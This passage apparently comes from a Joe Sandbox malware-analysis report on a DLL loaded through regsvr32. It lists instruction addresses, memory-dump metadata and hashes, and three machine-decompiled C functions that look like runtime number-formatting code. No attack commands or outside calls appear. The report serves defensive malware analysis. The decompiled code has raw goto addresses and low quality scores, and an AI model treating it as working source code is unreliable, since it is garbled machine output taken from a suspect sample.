                                                                                                              0x18002ca1e
                                                                                                              0x18002ca27
                                                                                                              0x18002ca2d
                                                                                                              0x18002ca32
                                                                                                              0x18002ca38
                                                                                                              0x18002ca43
                                                                                                              0x18002ca4d
                                                                                                              0x18002ca4f
                                                                                                              0x18002ca53
                                                                                                              0x18002ca58
                                                                                                              0x18002ca5a
                                                                                                              0x18002ca5e
                                                                                                              0x18002ca67
                                                                                                              0x18002ca69
                                                                                                              0x18002ca6d
                                                                                                              0x18002ca70
                                                                                                              0x18002ca7c
                                                                                                              0x18002ca86
                                                                                                              0x18002ca88
                                                                                                              0x18002ca8b
                                                                                                              0x18002ca8d
                                                                                                              0x18002ca93
                                                                                                              0x18002ca9e
                                                                                                              0x18002caa2
                                                                                                              0x18002caa4
                                                                                                              0x18002caac
                                                                                                              0x18002cab1
                                                                                                              0x18002cab3
                                                                                                              0x18002cab6
                                                                                                              0x18002cac4
                                                                                                              0x18002caca
                                                                                                              0x18002cacc
                                                                                                              0x18002cad1
                                                                                                              0x18002cad6
                                                                                                              0x18002cae5
                                                                                                              0x18002caec
                                                                                                              0x18002caf0
                                                                                                              0x18002caf5
                                                                                                              0x18002caf8
                                                                                                              0x18002cafd
                                                                                                              0x18002cb00
                                                                                                              0x18002cb0e
                                                                                                              0x18002cb18
                                                                                                              0x18002cb21
                                                                                                              0x18002cb23
                                                                                                              0x18002cb29
                                                                                                              0x18002cb2f
                                                                                                              0x18002cb2f
                                                                                                              0x18002cb33
                                                                                                              0x18002cb36
                                                                                                              0x18002cb3b
                                                                                                              0x18002cb3b
                                                                                                              0x18002cb45
                                                                                                              0x18002cb4c
                                                                                                              0x18002cb51
                                                                                                              0x18002cb5c
                                                                                                              0x18002cb64
                                                                                                              0x18002cb66
                                                                                                              0x18002cb6b
                                                                                                              0x18002cb6f
                                                                                                              0x18002cb7a
                                                                                                              0x18002cb80
                                                                                                              0x18002cb84
                                                                                                              0x18002cb89
                                                                                                              0x18002cb8b
                                                                                                              0x18002cb90
                                                                                                              0x18002cb92
                                                                                                              0x18002cb9c
                                                                                                              0x18002cba2
                                                                                                              0x18002cbaa
                                                                                                              0x18002cbac
                                                                                                              0x18002cbb2
                                                                                                              0x18002cbb8
                                                                                                              0x18002cbbe
                                                                                                              0x18002cbc4
                                                                                                              0x18002cbcb
                                                                                                              0x18002cbcf
                                                                                                              0x18002cbd4
                                                                                                              0x18002cbd8
                                                                                                              0x18002cbe1
                                                                                                              0x18002cbe7
                                                                                                              0x18002cbf3
                                                                                                              0x18002cbf5
                                                                                                              0x18002cbfc
                                                                                                              0x18002cc09
                                                                                                              0x18002cc11
                                                                                                              0x18002cc16
                                                                                                              0x18002cc1d
                                                                                                              0x18002cc1f
                                                                                                              0x18002cc21
                                                                                                              0x18002cc24
                                                                                                              0x18002cc2d
                                                                                                              0x18002cc31
                                                                                                              0x18002cc38
                                                                                                              0x18002cc3d
                                                                                                              0x18002cc42
                                                                                                              0x18002cc46
                                                                                                              0x18002cc51
                                                                                                              0x18002cc53
                                                                                                              0x18002cc58
                                                                                                              0x18002cc5a
                                                                                                              0x18002cc65
                                                                                                              0x18002cc6b
                                                                                                              0x18002cc6f
                                                                                                              0x18002cc74
                                                                                                              0x18002cc76
                                                                                                              0x18002cc7b
                                                                                                              0x18002cc7d
                                                                                                              0x18002cc87
                                                                                                              0x18002cc8d
                                                                                                              0x18002cc95
                                                                                                              0x18002cc97
                                                                                                              0x18002cc9d
                                                                                                              0x18002cccb

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80cba162663282b24e2422ae0098691d2927aef6c283a6cd7ade8e37cbb693f5
                                                                                                              • Instruction ID: 55a3743547ffe318b0961c9a4525c37079d4abb0de2bd261f6771f51dbb1a311
                                                                                                              • Opcode Fuzzy Hash: 80cba162663282b24e2422ae0098691d2927aef6c283a6cd7ade8e37cbb693f5
                                                                                                              • Instruction Fuzzy Hash: ACD19E7660064C86EBABCB298000BED27A1E74DBCCF248206EE49176D5DF35CA4AD743
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180026288 Relevance: .2, Instructions: 250COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65cac433d0b09cd3a4e2713ba3693c78770682f9a28e730f141a2aa864c1d80e
                                                                                                              • Instruction ID: ae1f7f79d55d5b4fa4a915a00497f0d4edf9f9b8e1953a709ce6db21be07e810
                                                                                                              • Opcode Fuzzy Hash: 65cac433d0b09cd3a4e2713ba3693c78770682f9a28e730f141a2aa864c1d80e
                                                                                                              • Instruction Fuzzy Hash: 7AB18172A04B9885E7A7CF29C0543AC3BA4F34DB89F688119EF4A073A9CF35C659C744
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004067C Relevance: .2, Instructions: 204COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2cf1c6814dadc59e4b5e484a6515ffec585909e3e62a6d5aa2bafb27fe1c7b94
                                                                                                              • Instruction ID: 48af4c86193b3bd39b5eb8d164cd7d00b82aee899546e66f6c21a6cfc5f69dce
                                                                                                              • Opcode Fuzzy Hash: 2cf1c6814dadc59e4b5e484a6515ffec585909e3e62a6d5aa2bafb27fe1c7b94
                                                                                                              • Instruction Fuzzy Hash: 6B81F972608B8846EBF5CB1994C039A7A91F38D7D8F25C219FB8957B95DF3CC6488B04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001C0F4 Relevance: .2, Instructions: 155COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 21%
                                                                                                              			E0000000118001C0F4(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t86;
				signed int _t95;
				void* _t104;
				intOrPtr _t105;
				signed int _t109;
				intOrPtr _t123;
				void* _t126;
				signed long long _t147;
				signed long long _t148;
				void* _t154;
				void* _t156;
				void* _t157;

				_t154 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t126 = __rcx;
				r14b = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t104 = _t86 - 5;
				if (_t104 > 0) goto 0x8001c1d3;
				if (_t104 == 0) goto 0x8001c14d;
				_t105 = _t86;
				if (_t105 == 0) goto 0x8001c227;
				if (_t105 == 0) goto 0x8001c1a3;
				if (_t105 == 0) goto 0x8001c174;
				if (_t105 == 0) goto 0x8001c227;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001c1f3;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c250;
				0x800199c8();
				goto 0x8001c255;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c199;
				E00000001180017368( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001c255;
				0x80017a10();
				goto 0x8001c255;
				_a8 = _a8 & 0x00000000;
				_t109 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t109 == 0) goto 0x8001c1c9;
				_t72 = E00000001180016A80( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001c255;
				E00000001180016EF8(_t72, __rcx, __rcx,  &_a8, _t154);
				goto 0x8001c255;
				if (_t109 == 0) goto 0x8001c14d;
				if (_t109 == 0) goto 0x8001c14d;
				if (_t109 == 0) goto 0x8001c14d;
				goto 0x8001c13b;
				_t123 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t123 + 0x30)) = 1;
				 *((intOrPtr*)(_t123 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001c30b;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001c249;
				0x80017e80();
				goto 0x8001c255;
				E000000011800182E8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t154);
				goto 0x8001c255;
				0x80019e38();
				if (0 == 0) goto 0x8001c220;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001c26f;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c309;
				_t147 = _a8;
				if (0 == 0) goto 0x8001c28d;
				if (_t147 >= 0) goto 0x8001c28d;
				_t148 =  ~_t147;
				_t95 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t95;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c29c;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001c2b3;
				 *(__rcx + 0x28) = _t95 & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001c2bc;
				 *(_t126 + 0x28) =  *(_t126 + 0x28) & 0xffffffdf;
				 *((char*)(_t126 + 0x4c)) = 1;
				r8b = r14b;
				if (_t157 != _t157) goto 0x8001c2d5;
				E00000001180021410(0, _t126, _t148, _t156);
				goto 0x8001c2dc;
				0x8001fe98();
				if (0 == 0) goto 0x8001c309;
				if ( *((intOrPtr*)(_t126 + 0x48)) == 0) goto 0x8001c2fa;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x40)))) == 0x30) goto 0x8001c309;
				 *((long long*)(_t126 + 0x40)) =  *((long long*)(_t126 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t126 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t126 + 0x48)) =  *((intOrPtr*)(_t126 + 0x48)) + 1;
				return 1;
			}



















                                                                                                              0x18001c0f4
                                                                                                              0x18001c0f4
                                                                                                              0x18001c0f9
                                                                                                              0x18001c0fe
                                                                                                              0x18001c10f
                                                                                                              0x18001c112
                                                                                                              0x18001c115
                                                                                                              0x18001c118
                                                                                                              0x18001c11e
                                                                                                              0x18001c121
                                                                                                              0x18001c127
                                                                                                              0x18001c129
                                                                                                              0x18001c12b
                                                                                                              0x18001c134
                                                                                                              0x18001c139
                                                                                                              0x18001c13e
                                                                                                              0x18001c147
                                                                                                              0x18001c154
                                                                                                              0x18001c164
                                                                                                              0x18001c16a
                                                                                                              0x18001c16f
                                                                                                              0x18001c17b
                                                                                                              0x18001c18d
                                                                                                              0x18001c18f
                                                                                                              0x18001c194
                                                                                                              0x18001c199
                                                                                                              0x18001c19e
                                                                                                              0x18001c1aa
                                                                                                              0x18001c1ba
                                                                                                              0x18001c1bd
                                                                                                              0x18001c1bf
                                                                                                              0x18001c1c4
                                                                                                              0x18001c1c9
                                                                                                              0x18001c1ce
                                                                                                              0x18001c1d6
                                                                                                              0x18001c1df
                                                                                                              0x18001c1e8
                                                                                                              0x18001c1ee
                                                                                                              0x18001c1f3
                                                                                                              0x18001c1f7
                                                                                                              0x18001c1fa
                                                                                                              0x18001c201
                                                                                                              0x18001c205
                                                                                                              0x18001c210
                                                                                                              0x18001c215
                                                                                                              0x18001c21b
                                                                                                              0x18001c222
                                                                                                              0x18001c22e
                                                                                                              0x18001c240
                                                                                                              0x18001c242
                                                                                                              0x18001c247
                                                                                                              0x18001c249
                                                                                                              0x18001c24e
                                                                                                              0x18001c250
                                                                                                              0x18001c257
                                                                                                              0x18001c260
                                                                                                              0x18001c269
                                                                                                              0x18001c274
                                                                                                              0x18001c27d
                                                                                                              0x18001c282
                                                                                                              0x18001c284
                                                                                                              0x18001c287
                                                                                                              0x18001c28a
                                                                                                              0x18001c291
                                                                                                              0x18001c293
                                                                                                              0x18001c29a
                                                                                                              0x18001c2a7
                                                                                                              0x18001c2ae
                                                                                                              0x18001c2b6
                                                                                                              0x18001c2b8
                                                                                                              0x18001c2bc
                                                                                                              0x18001c2c0
                                                                                                              0x18001c2c9
                                                                                                              0x18001c2ce
                                                                                                              0x18001c2d3
                                                                                                              0x18001c2d7
                                                                                                              0x18001c2e4
                                                                                                              0x18001c2ef
                                                                                                              0x18001c2f8
                                                                                                              0x18001c2fa
                                                                                                              0x18001c303
                                                                                                              0x18001c306
                                                                                                              0x18001c323

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05fb3ede8e1ec6b044eac67d4ffc944bfe70253aa37e40454b6e93026fbf674d
                                                                                                              • Instruction ID: 7f9df21fbc3d95ae1ad3d89745343fffad2632801c14bcc3888baa4ec8f45c10
                                                                                                              • Opcode Fuzzy Hash: 05fb3ede8e1ec6b044eac67d4ffc944bfe70253aa37e40454b6e93026fbf674d
                                                                                                              • Instruction Fuzzy Hash: 41518372100E8887EBA69E68C0147ED27A0F74DBDCF158215FA4A4B6D9CF35CA49C74A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001F104 Relevance: .2, Instructions: 155COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 32%
                                                                                                              			E0000000118001F104(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t87;
				signed int _t96;
				void* _t105;
				intOrPtr _t106;
				signed int _t110;
				intOrPtr _t124;
				void* _t127;
				signed long long _t148;
				signed long long _t149;
				void* _t155;
				void* _t157;

				_t155 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t127 = __rcx;
				r14b = __edx;
				_t87 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t105 = _t87 - 5;
				if (_t105 > 0) goto 0x8001f1e3;
				if (_t105 == 0) goto 0x8001f15d;
				_t106 = _t87;
				if (_t106 == 0) goto 0x8001f237;
				if (_t106 == 0) goto 0x8001f1b3;
				if (_t106 == 0) goto 0x8001f184;
				if (_t106 == 0) goto 0x8001f237;
				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001f203;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f260;
				0x800199c8();
				goto 0x8001f265;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f1a9;
				E00000001180017368( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001f265;
				0x80017a10();
				goto 0x8001f265;
				_a8 = _a8 & 0x00000000;
				_t110 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t110 == 0) goto 0x8001f1d9;
				_t72 = E00000001180016A80( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001f265;
				E00000001180016EF8(_t72, __rcx, __rcx,  &_a8, _t155);
				goto 0x8001f265;
				if (_t110 == 0) goto 0x8001f15d;
				if (_t110 == 0) goto 0x8001f15d;
				if (_t110 == 0) goto 0x8001f15d;
				goto 0x8001f14b;
				_t124 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t124 + 0x30)) = 1;
				 *((intOrPtr*)(_t124 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001f31b;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001f259;
				0x80017e80();
				goto 0x8001f265;
				E000000011800182E8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t155);
				goto 0x8001f265;
				0x80019e38();
				if (0 == 0) goto 0x8001f230;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001f27f;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001f319;
				_t148 = _a8;
				if (0 == 0) goto 0x8001f29d;
				if (_t148 >= 0) goto 0x8001f29d;
				_t149 =  ~_t148;
				_t96 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t96;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f2ac;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001f2c3;
				 *(__rcx + 0x28) = _t96 & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t149,  *((intOrPtr*)(__rcx + 8)));
				if (_t149 != 0) goto 0x8001f2cc;
				 *(_t127 + 0x28) =  *(_t127 + 0x28) & 0xffffffdf;
				 *((char*)(_t127 + 0x4c)) = 1;
				r8b = r14b;
				if (_t157 != _t157) goto 0x8001f2e5;
				E0000000118002232C(0, _t127, _t149);
				goto 0x8001f2ec;
				E00000001180020D6C(__esi, _t127);
				if (0 == 0) goto 0x8001f319;
				if ( *((intOrPtr*)(_t127 + 0x48)) == 0) goto 0x8001f30a;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x40)))) == 0x30) goto 0x8001f319;
				 *((long long*)(_t127 + 0x40)) =  *((long long*)(_t127 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t127 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t127 + 0x48)) =  *((intOrPtr*)(_t127 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001f104
                                                                                                              0x18001f104
                                                                                                              0x18001f109
                                                                                                              0x18001f10e
                                                                                                              0x18001f11f
                                                                                                              0x18001f122
                                                                                                              0x18001f125
                                                                                                              0x18001f128
                                                                                                              0x18001f12e
                                                                                                              0x18001f131
                                                                                                              0x18001f137
                                                                                                              0x18001f139
                                                                                                              0x18001f13b
                                                                                                              0x18001f144
                                                                                                              0x18001f149
                                                                                                              0x18001f14e
                                                                                                              0x18001f157
                                                                                                              0x18001f164
                                                                                                              0x18001f174
                                                                                                              0x18001f17a
                                                                                                              0x18001f17f
                                                                                                              0x18001f18b
                                                                                                              0x18001f19d
                                                                                                              0x18001f19f
                                                                                                              0x18001f1a4
                                                                                                              0x18001f1a9
                                                                                                              0x18001f1ae
                                                                                                              0x18001f1ba
                                                                                                              0x18001f1ca
                                                                                                              0x18001f1cd
                                                                                                              0x18001f1cf
                                                                                                              0x18001f1d4
                                                                                                              0x18001f1d9
                                                                                                              0x18001f1de
                                                                                                              0x18001f1e6
                                                                                                              0x18001f1ef
                                                                                                              0x18001f1f8
                                                                                                              0x18001f1fe
                                                                                                              0x18001f203
                                                                                                              0x18001f207
                                                                                                              0x18001f20a
                                                                                                              0x18001f211
                                                                                                              0x18001f215
                                                                                                              0x18001f220
                                                                                                              0x18001f225
                                                                                                              0x18001f22b
                                                                                                              0x18001f232
                                                                                                              0x18001f23e
                                                                                                              0x18001f250
                                                                                                              0x18001f252
                                                                                                              0x18001f257
                                                                                                              0x18001f259
                                                                                                              0x18001f25e
                                                                                                              0x18001f260
                                                                                                              0x18001f267
                                                                                                              0x18001f270
                                                                                                              0x18001f279
                                                                                                              0x18001f284
                                                                                                              0x18001f28d
                                                                                                              0x18001f292
                                                                                                              0x18001f294
                                                                                                              0x18001f297
                                                                                                              0x18001f29a
                                                                                                              0x18001f2a1
                                                                                                              0x18001f2a3
                                                                                                              0x18001f2aa
                                                                                                              0x18001f2b7
                                                                                                              0x18001f2be
                                                                                                              0x18001f2c6
                                                                                                              0x18001f2c8
                                                                                                              0x18001f2cc
                                                                                                              0x18001f2d0
                                                                                                              0x18001f2d9
                                                                                                              0x18001f2de
                                                                                                              0x18001f2e3
                                                                                                              0x18001f2e7
                                                                                                              0x18001f2f4
                                                                                                              0x18001f2ff
                                                                                                              0x18001f308
                                                                                                              0x18001f30a
                                                                                                              0x18001f313
                                                                                                              0x18001f316
                                                                                                              0x18001f333

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 537412fdb35c66556ec448a426ec85e8787e100ea82ee138dc8340c927b46ac2
                                                                                                              • Instruction ID: 4a907f3b4ce2c082259746ba0b0b1e0c32b9099279bd48910b0a96611d205046
                                                                                                              • Opcode Fuzzy Hash: 537412fdb35c66556ec448a426ec85e8787e100ea82ee138dc8340c927b46ac2
                                                                                                              • Instruction Fuzzy Hash: F7517C76114E4882EBB78E28C0553F827A0E74DBECF158215FA4A4B7D9CF35CA4AC701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001C6FC Relevance: .2, Instructions: 155COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 33%
                                                                                                              			E0000000118001C6FC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t87;
				signed int _t96;
				void* _t105;
				intOrPtr _t106;
				signed int _t110;
				intOrPtr _t124;
				void* _t127;
				signed long long _t148;
				signed long long _t149;
				void* _t155;
				void* _t157;
				void* _t158;

				_t155 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t127 = __rcx;
				r14b = __edx;
				_t87 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t105 = _t87 - 5;
				if (_t105 > 0) goto 0x8001c7db;
				if (_t105 == 0) goto 0x8001c755;
				_t106 = _t87;
				if (_t106 == 0) goto 0x8001c82f;
				if (_t106 == 0) goto 0x8001c7ab;
				if (_t106 == 0) goto 0x8001c77c;
				if (_t106 == 0) goto 0x8001c82f;
				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001c7fb;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c858;
				0x80019ad0();
				goto 0x8001c85d;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c7a1;
				E00000001180017474( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001c85d;
				0x80017b18();
				goto 0x8001c85d;
				_a8 = _a8 & 0x00000000;
				_t110 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t110 == 0) goto 0x8001c7d1;
				_t72 = E00000001180016B8C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001c85d;
				E00000001180017000(_t72, __rcx, __rcx,  &_a8, _t155);
				goto 0x8001c85d;
				if (_t110 == 0) goto 0x8001c755;
				if (_t110 == 0) goto 0x8001c755;
				if (_t110 == 0) goto 0x8001c755;
				goto 0x8001c743;
				_t124 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t124 + 0x30)) = 1;
				 *((intOrPtr*)(_t124 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001c913;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001c851;
				0x80017f88();
				goto 0x8001c85d;
				E000000011800183F0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t155);
				goto 0x8001c85d;
				0x80019f40();
				if (0 == 0) goto 0x8001c828;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001c877;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c911;
				_t148 = _a8;
				if (0 == 0) goto 0x8001c895;
				if (_t148 >= 0) goto 0x8001c895;
				_t149 =  ~_t148;
				_t96 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t96;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c8a4;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001c8bb;
				 *(__rcx + 0x28) = _t96 & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t149,  *((intOrPtr*)(__rcx + 8)));
				if (_t149 != 0) goto 0x8001c8c4;
				 *(_t127 + 0x28) =  *(_t127 + 0x28) & 0xffffffdf;
				 *((char*)(_t127 + 0x4c)) = 1;
				r8b = r14b;
				if (_t158 != _t158) goto 0x8001c8dd;
				E000000011800215A8(0, _t127, _t149, _t157);
				goto 0x8001c8e4;
				E00000001180020030(__esi, _t127, _t157);
				if (0 == 0) goto 0x8001c911;
				if ( *((intOrPtr*)(_t127 + 0x48)) == 0) goto 0x8001c902;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x40)))) == 0x30) goto 0x8001c911;
				 *((long long*)(_t127 + 0x40)) =  *((long long*)(_t127 + 0x40)) + 0xfffffffe;
